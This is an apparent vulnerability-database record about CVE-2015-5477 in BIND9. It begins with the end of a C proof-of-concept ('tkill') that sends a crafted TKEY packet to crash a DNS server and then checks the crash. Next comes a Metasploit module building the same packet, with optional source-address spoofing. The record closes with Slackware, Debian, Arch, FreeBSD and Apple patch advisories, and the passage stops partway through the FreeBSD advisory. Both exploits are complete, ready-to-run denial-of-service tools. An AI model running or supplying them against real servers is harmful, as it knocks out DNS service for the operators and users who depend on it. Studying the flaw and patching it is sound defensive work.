This allows slave servers to get updates\r\n from master servers without a MitM attack (like from the NSA)\r\n changing the data on the network.\r\n \r\n A password can be distributed out of band, such as SSHing into\r\n a box and editing the configuration file. Another way is through\r\n public-keys. That's the \"TKEY\" feature: it distributes new\r\n TSIG passwords using public-keys.\r\n \r\n When processing a TKEY packet, the code will call a function to\r\n fetch the proper TKEY record. It looks in two places: the\r\n \"answer records\" section, and the \"additional records\" section.\r\n If it can't find it in the \"additional\", it looks in \"answer\".\r\n \r\n The lookup function takes a parameter that is initially set\r\n to NULL. During the failed lookup in the \"additional\" section,\r\n it may set that parameter to a non-null value. Since a non-null\r\n value is passed in again during the second lookup in the \"answer\"\r\n section, the code crashes.\r\n \r\n The patch was to set the variable to NULL before the second lookup.\r\n \r\n The correct fix would simply not check to see if the parameter\r\n was NULL to begin with. It's an out-only parameter, so its value\r\n on input doesn't matter.\r\n \r\n This is just a \"brainfart\" bug that can only result in a crash\r\n of the server. It can't result in data-corruption or code\r\n execution.\r\n \r\n About this code:\r\n To learn about writing network code, this is probably something useful\r\n to study.\r\n \r\n It works on both Windows and Unix (Linux, Mac, etc.). You can see where\r\n the differences are between the two platforms, as well as the similarities.\r\n \r\n It works on both IPv4 and IPv6. However, if you search through the code,\r\n you'll find nothing that specifically references either version. It's\r\n magically dual-stack. 
That's because it uses new functions like\r\n \"getaddrinfo()\" instead of old functions like \"gethostbyname()\".\r\n \r\nSource: https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n \r\n#ifdef WIN32\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n#define WSA(err) (WSA##err)\r\n#define WSAEAGAIN WSAETIMEDOUT\r\n#else\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n#include <arpa/inet.h>\r\n#include <errno.h>\r\n#define WSAGetLastError() (errno)\r\n#define WSA(err) (err)\r\n#define closesocket(fd) close(fd)\r\n#endif\r\n \r\n/*\r\n * DoS packet that will crash server\r\n */\r\nstatic const unsigned char dospacket[] = {\r\n 0x01, 0x02, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x01, /* one additional: must be 'additional' section to work*/\r\n \r\n /* Query name */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,\r\n 0x00, 249, /* TKEY record type */\r\n 0x00, 255,\r\n \r\n /* Additional record */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */\r\n 0x00, 16, /* record type: must NOT be 249/TKEY */\r\n 0x00, 255,\r\n 0, 0, 0, 0,\r\n 0, 51,\r\n 50,\r\n 'h', 't', 't', 'p', 's', ':', '/', '/', \r\n 'g', 'i', 't', 'h', 'u', 'b', '.', 'c', \r\n 'o', 'm', '/', 'r', 'o', 'b', 'e', 'r', \r\n 't', 'd', 'a', 'v', 'i', 'd', 'g', 'r', \r\n 'a', 'h', 'a', 'm', '/', 'c', 'v', 'e', \r\n '-', '2', '0', '1', '5', '-', '5', '4', \r\n '7', '7'\r\n};\r\n \r\n \r\n/*\r\n * Packet for querying the version of the server, to test if it's up\r\n */\r\nstatic const unsigned char versionpacket[] = {\r\n 0x03, 0x04, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no 
authorities */\r\n 0x00, 0x00, /* no additional */\r\n \r\n /* Query name */\r\n 0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,\r\n 0x00, 16, /* TXT */\r\n 0x00, 3, /* CHAOS */\r\n};\r\n \r\n \r\n/*\r\n * YOLO BIND version.bind query\r\n */\r\nint query_version(int fd, const struct addrinfo *target)\r\n{\r\n int bytes_received;\r\n int i;\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n char hostname[256];\r\n unsigned char buf[2048];\r\n int result = 0;\r\n \r\n /* \r\n * Query version \r\n */\r\n sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0, \r\n target->ai_addr, target->ai_addrlen);\r\n \r\n \r\n /* \r\n * get response \r\n */\r\nagain:\r\n bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[-] timed out getting version, trying again\\n\");\r\n return 0;\r\n } else if (bytes_received <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n return 0;\r\n }\r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n \r\n /* \r\n * parse response \r\n */\r\n if (bytes_received < 12)\r\n goto again;\r\n if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])\r\n goto again;\r\n if ((buf[2]&0x80) != 0x80)\r\n goto again;\r\n \r\n /*\r\n * Handle response code \r\n */\r\n switch (buf[3]&0x0F) {\r\n case 0:\r\n /* parse packet below */\r\n break;\r\n case 1:\r\n fprintf(stderr, \"[-] %s: FORMERR\\n\", hostname);\r\n return 1;\r\n case 2:\r\n fprintf(stderr, \"[-] %s: SRVFAIL\\n\", hostname);\r\n return 1;\r\n case 3:\r\n fprintf(stderr, \"[-] %s: NAMERR\\n\", hostname);\r\n return 1;\r\n case 4:\r\n fprintf(stderr, \"[-] %s: NOTIMPL\\n\", hostname);\r\n return 1;\r\n case 5:\r\n fprintf(stderr, \"[-] %s: REFUSED\\n\", hostname);\r\n return 1;\r\n default:\r\n 
fprintf(stderr, \"[-] %s: unknown error: %u\\n\", hostname, buf[3]);\r\n return 1;\r\n }\r\n \r\n \r\n i = 12; /* skip header */\r\n \r\n /* \r\n * skip query name \r\n */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n i += 4;\r\n \r\n /* \r\n * process all answers \r\n */\r\n while (i + 12 <= bytes_received) {\r\n int t, c, len;\r\n \r\n /* skip answer name */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n \r\n /* extract resource-recorder header */\r\n if (i + 10 > bytes_received)\r\n break;\r\n t = buf[i+0]<<8 | buf[i+1];\r\n c = buf[i+2]<<8 | buf[i+3];\r\n len = buf[i+8]<<8 | buf[i+9];\r\n i += 10;\r\n \r\n /* verify TXT CHAOS */\r\n if (t != 16 || c != 3) {\r\n i += len;\r\n continue;\r\n }\r\n \r\n /* fix len */\r\n if (len > bytes_received - i)\r\n len = bytes_received - i;\r\n \r\n /* print the hostname */\r\n fprintf(stderr, \"[+] %s: \", hostname);\r\n \r\n /* print the strings */\r\n {\r\n int j = i;\r\n \r\n i += len;\r\n \r\n while (j < i) {\r\n int len2 = buf[j];\r\n int k;\r\n j++;\r\n if (len2 > bytes_received - len2)\r\n len2 = bytes_received - len2;\r\n fprintf(stderr, \"\\\"\");\r\n \r\n for (k=j; k<j+len2; k++) {\r\n if (buf[k] == '\\\\')\r\n fprintf(stderr, \"\\\\\");\r\n else if (!isprint(buf[k]))\r\n fprintf(stderr, \"\\\\x%02x\", buf[k]);\r\n else\r\n fprintf(stderr, \"%c\", buf[k]);\r\n }\r\n \r\n j = k;\r\n \r\n fprintf(stderr, \"\\\" \");\r\n }\r\n fprintf(stderr, \"\\n\");\r\n }\r\n result = 1;\r\n }\r\n return result;\r\n}\r\n \r\n/*\r\n * Send the DoS packet\r\n */\r\nvoid probe(const struct addrinfo *target)\r\n{\r\n int fd;\r\n int x;\r\n int i;\r\n char hostname[256];\r\n char buf[2048];\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = 
sizeof(from);\r\n \r\n \r\n /*\r\n * Print status\r\n */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[+] %s: Probing...\\n\", hostname);\r\n \r\n /*\r\n * Create a socket\r\n */\r\n fd = socket(target->ai_family, SOCK_DGRAM, 0);\r\n if (fd <= 0) {\r\n fprintf(stderr, \"[-] failed: socket(): %u\\n\", WSAGetLastError());\r\n return;\r\n }\r\n \r\n /*\r\n * Set the timeout to 5-seconds\r\n */\r\n {\r\n#ifdef WIN32\r\n int milliseconds = 5000;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));\r\n#else\r\n struct timeval t;\r\n t.tv_sec = 5;\r\n t.tv_usec = 0;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));\r\n#endif\r\n \r\n if (x != 0) {\r\n fprintf(stderr, \"[-] err setting recv timeout: %u\\n\", WSAGetLastError());\r\n }\r\n }\r\n \r\n \r\n /*\r\n * First, query the server to grab its version, but also to see it's up\r\n */\r\n fprintf(stderr, \"[+] Querying version...\\n\");\r\n for (i=0; i<3; i++) {\r\n if (query_version(fd, target))\r\n break;\r\n if (i == 2) {\r\n fprintf(stderr, \"[-] Can't query server, is it crashed already?\\n\");\r\n fprintf(stderr, \"[-] Sending exploit anyway.\\n\");\r\n }\r\n }\r\n \r\n \r\n /*****************\r\n * SEND DoS PACKET\r\n *****************/\r\n fprintf(stderr, \"[+] Sending DoS packet...\\n\");\r\n sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);\r\n \r\n /* Grab response */\r\n fprintf(stderr, \"[+] Waiting 5-sec for response...\\n\");\r\n for (;;) {\r\n x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[+] timed out, probably crashed\\n\");\r\n break;\r\n } else if (x <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n break;;\r\n }\r\n \r\n if (x > 2 && (buf[0] != 
dospacket[0] || buf[1] != dospacket[1]))\r\n continue;\r\n \r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[-] %s: got response, so probably not vulnerable\\n\", hostname);\r\n break;\r\n }\r\n \r\n \r\n closesocket(fd);\r\n}\r\n \r\n \r\n/*\r\n * The main function just parses the arguments and looks up IP addrsses\r\n * before calling the \"probe\" function to actually exploit the targets\r\n */\r\nint main(int argc, char *argv[])\r\n{\r\n int i;\r\n \r\n#ifdef WIN32\r\n {WSADATA x; WSAStartup(0x101, &x);}\r\n#endif\r\n \r\n fprintf(stderr, \"--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\\n\");\r\n \r\n if (argc <= 1) {\r\n fprintf(stderr, \"[-] no host specified\\n\");\r\n fprintf(stderr, \"usage:\\n tkill <hostname>\\n\");\r\n return -1;\r\n }\r\n \r\n \r\n /*\r\n * Query all targets specified on the command line\r\n */\r\n for (i=1; i<argc; i++) {\r\n const char *hostname = argv[i];\r\n struct addrinfo *info;\r\n struct addrinfo *target;\r\n char oldtarget[256] = \"\";\r\n int x;\r\n \r\n /*\r\n * Lookup the name of the target\r\n */\r\n fprintf(stderr, \"[+] %s: Resolving to IP address\\n\", hostname);\r\n x = getaddrinfo(hostname, \"53\", 0, &info);\r\n if (x != 0) {\r\n fprintf(stderr, \"[-] %s: failed: %s\\n\", hostname, gai_strerror(x));\r\n continue;\r\n }\r\n \r\n if (info->ai_next) {\r\n fprintf(stderr, \"[+] %s: Resolved to multiple IPs (NOTE)\\n\", hostname);\r\n }\r\n \r\n /*\r\n * Since a name can return multiple IP addresses,\r\n * send a probe to all the results\r\n */\r\n for (target=info; target; target = target->ai_next) {\r\n char newtarget[256];\r\n \r\n /* bah, stupid bug in Linux gets the same target multiple\r\n * times */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);\r\n if (strcmp(newtarget, oldtarget) == 0)\r\n continue;\r\n memcpy(oldtarget, newtarget, sizeof(oldtarget));\r\n \r\n 
probe(target);\r\n printf(\"\\n\");\r\n }\r\n \r\n /*\r\n * Cleanup\r\n */\r\n freeaddrinfo(info);\r\n }\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/23948", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T07:04:09", "description": "This module sends a malformed TKEY query, which exploits an error in handling TKEY queries on affected BIND9 'named' DNS servers. As a result, a vulnerable named server will exit with a REQUIRE assertion failure. This condition can be exploited in versions of BIND between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0 through 9.10.2-P2.#### Usage Info\nmsf > use auxiliary/dos/dns/bind_tkey\rmsf auxiliary(bind_tkey) > show actions\r...actions...\rmsf auxiliary(bind_tkey) > set ACTION <action-name>\rmsf auxiliary(bind_tkey) > show options\r...show and set options...\rmsf auxiliary(bind_tkey) > run", "cvss3": {}, "published": "2015-08-04T00:00:00", "type": "zdt", "title": "BIND9 TKEY Query Denial of Service Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-04T00:00:00", "id": "1337DAY-ID-23960", "href": "https://0day.today/exploit/description/23960", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Capture\r\n include Msf::Auxiliary::UDPScanner\r\n include Msf::Auxiliary::Dos\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'BIND TKEY Query Denial of Service',\r\n 'Description' => %q{\r\n This module sends a malformed TKEY query, which exploits an\r\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\r\n As a result, a vulnerable named server will exit with a REQUIRE\r\n assertion failure. 
This condition can be exploited in versions of BIND\r\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\r\n through 9.10.2-P2.\r\n },\r\n 'Author' => [\r\n 'Jonathan Foote', # Original discoverer\r\n 'throwawayokejxqbbif', # PoC\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2015-5477'],\r\n ['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],\r\n ['URL', 'https://kb.isc.org/article/AA-01272'],\r\n ['URL', 'https://github.com/rapid7/metasploit-framework/issues/5790']\r\n ],\r\n 'DisclosureDate' => 'Jul 28 2015',\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(53),\r\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof', nil])\r\n ])\r\n\r\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\r\n end\r\n\r\n def scan_host(ip)\r\n if datastore['SRC_ADDR']\r\n scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])\r\n else\r\n print_status(\"Sending packet to #{ip}\")\r\n scanner_send(payload, ip, rport)\r\n end\r\n end\r\n\r\n def payload\r\n name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\r\n txt = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\r\n\r\n name_length = [name.length].pack('C')\r\n txt_length = [txt.length].pack('C')\r\n data_length = [txt.length + 1].pack('n')\r\n ttl = [rand(2 ** 31 - 1) + 1].pack('N')\r\n\r\n query = \"\\x00\\x00\" # Transaction ID: 0x0000\r\n query << \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query << \"\\x00\\x01\" # Questions: 1\r\n query << \"\\x00\\x00\" # Answer RRs: 0\r\n query << \"\\x00\\x00\" # Authority RRs: 0\r\n query << \"\\x00\\x01\" # Additional RRs: 1\r\n\r\n query << name_length # [Name Length]\r\n query << name # Name\r\n query << \"\\x00\" # [End of name]\r\n query << \"\\x00\\xf9\" # Type: TKEY (Transaction Key) (249)\r\n query << \"\\x00\\x01\" # Class: IN 
(0x0001)\r\n\r\n query << name_length # [Name Length]\r\n query << name # Name\r\n query << \"\\x00\" # [End of name]\r\n query << \"\\x00\\x10\" # Type: TXT (Text strings) (16)\r\n query << \"\\x00\\x01\" # Class: IN (0x0001)\r\n query << ttl # Time to live\r\n query << data_length # Data length\r\n query << txt_length # TXT Length\r\n query << txt # TXT\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-06] #", "sourceHref": "https://0day.today/exploit/23960", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2021-07-28T14:46:46", "description": "New bind packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/bind-9.9.7_P2-i486-1_slack14.1.txz: Upgraded.\n This update fixes a security issue where an error in the handling of TKEY\n queries can be exploited by an attacker for use as a denial-of-service\n vector, as a constructed packet can use the defect to trigger a REQUIRE\n assertion failure, causing BIND to exit.\n Impact:\n Both recursive and authoritative servers are vulnerable to this defect.\n Additionally, exposure is not prevented by either ACLs or configuration\n options limiting or denying service because the exploitable code occurs\n early in the packet handling, before checks enforcing those boundaries.\n Operators should take steps to upgrade to a patched version as soon as\n possible.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477\n https://kb.isc.org/article/AA-01272\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.9.7_P2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.9.7_P2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.9.7_P2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.9.7_P2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.9.7_P2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.9.7_P2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.7_P2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.7_P2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bind-9.9.7_P2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bind-9.9.7_P2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.10.2_P3-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.10.2_P3-x86_64-1.txz\n\n\n
Installation instructions:\n\nUpgrade the package as root:\n > upgradepkg bind-9.9.7_P2-i486-1_slack14.1.txz\n\nThen, restart the name server:\n > /etc/rc.d/rc.bind restart", "cvss3": {}, "published": "2015-07-28T19:38:44", "type": "slackware", "title": "[slackware-security] bind", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T19:38:44", "id": 
"SSA-2015-209-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.554472", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "debiancve": [{"lastseen": "2022-05-18T23:31:42", "description": "named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.", "cvss3": {}, "published": "2015-07-29T14:59:00", "type": "debiancve", "title": "CVE-2015-5477", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T14:59:00", "id": "DEBIANCVE:CVE-2015-5477", "href": "https://security-tracker.debian.org/tracker/CVE-2015-5477", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "description": "A flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. 
A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet leading to denial of service.", "edition": 2, "cvss3": {}, "published": "2015-07-29T00:00:00", "type": "archlinux", "title": "bind: denial of service", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T00:00:00", "id": "ASA-201507-22", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-July/000376.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nISC reports:\n\nAn error in the handling of TKEY queries can be exploited\n\t by an attacker for use as a denial-of-service vector, as a constructed\n\t packet can use the defect to trigger a REQUIRE assertion failure,\n\t causing BIND to exit.\n\n\n", "cvss3": {}, "published": "2015-07-21T00:00:00", "type": "freebsd", "title": "bind -- denial of service vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2016-08-09T00:00:00", "id": "731CDEAA-3564-11E5-9970-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/731cdeaa-3564-11e5-9970-14dae9d210b8.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:00", "description": "\r\n\r\nAPPLE-SA-2015-08-13-4 OS X Server v4.1.5\r\n\r\nOS X Server v4.1.5 is now available and addresses the following:\r\n\r\nBIND\r\nAvailable for: OS X Yosemite v10.10.5 or later\r\nImpact: A remote attacker may be able to cause a denial of service\r\nDescription: An assertion issue existed in the handling of TKEY\r\npackets. This issue was addressed by updating BIND to version\r\n9.9.7-P2.\r\nCVE-ID\r\nCVE-2015-5477\r\n\r\n\r\nOS X Server v4.1.5 may be obtained from the Mac App Store.\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-08-17T00:00:00", "title": "APPLE-SA-2015-08-13-4 OS X Server v4.1.5", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32391", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32391", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "description": "\r\n\r\n=============================================================================\r\nFreeBSD-SA-15:17.bind Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: BIND remote denial of service vulnerability\r\n\r\nCategory: contrib\r\nModule: bind\r\nAnnounced: 2015-07-28\r\nCredits: ISC\r\nAffects: FreeBSD 8.x and FreeBSD 
9.x.\r\nCorrected: 2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE)\r\n 2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21)\r\n 2015-07-28 19:58:54 UTC (stable/8, 8.4-STABLE)\r\n 2015-07-28 19:59:22 UTC (releng/8.4, 8.4-RELEASE-p35)\r\nCVE Name: CVE-2015-5477\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:https://security.FreeBSD.org/>.\r\n\r\nI. Background\r\n\r\nBIND 9 is an implementation of the Domain Name System (DNS) protocols.\r\nThe named(8) daemon is an Internet Domain Name Server.\r\n\r\nII. Problem Description\r\n\r\nAn error in the handling of TKEY queries can be exploited by an attacker\r\nfor use as a denial-of-service vector, as a constructed packet can use\r\nthe defect to trigger a REQUIRE assertion failure, causing BIND to exit.\r\n\r\nIII. Impact\r\n\r\nA remote attacker can trigger a crash of a name server. Both recursive and\r\nauthoritative servers are affected, and the exposure can not be mitigated\r\nby either ACLs or configuration options limiting or denying service because\r\nthe exploitable code occurs early in the packet handling, before checks\r\nenforcing those boundaries.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available, but systems that are not running BIND are not\r\nvulnerable.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\r\nrelease / security branch (releng) dated after the correction date.\r\n\r\nThe named service has to be restarted after the update. 
A reboot is\r\nrecommended but not required.\r\n\r\n2) To update your vulnerable system via a binary patch:\r\n\r\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\r\nplatforms can be updated via the freebsd-update(8) utility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nThe named service has to be restarted after the update. A reboot is\r\nrecommended but not required.\r\n\r\n3) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to the applicable\r\nFreeBSD release branches.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch https://security.FreeBSD.org/patches/SA-15:17/bind.patch\r\n# fetch https://security.FreeBSD.org/patches/SA-15:17/bind.patch.asc\r\n# gpg --verify bind.patch.asc\r\n\r\nb) Apply the patch. Execute the following commands as root:\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile the operating system using buildworld and installworld as\r\ndescribed in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.\r\n\r\nRestart the applicable daemons, or reboot the system.\r\n\r\nVI. 
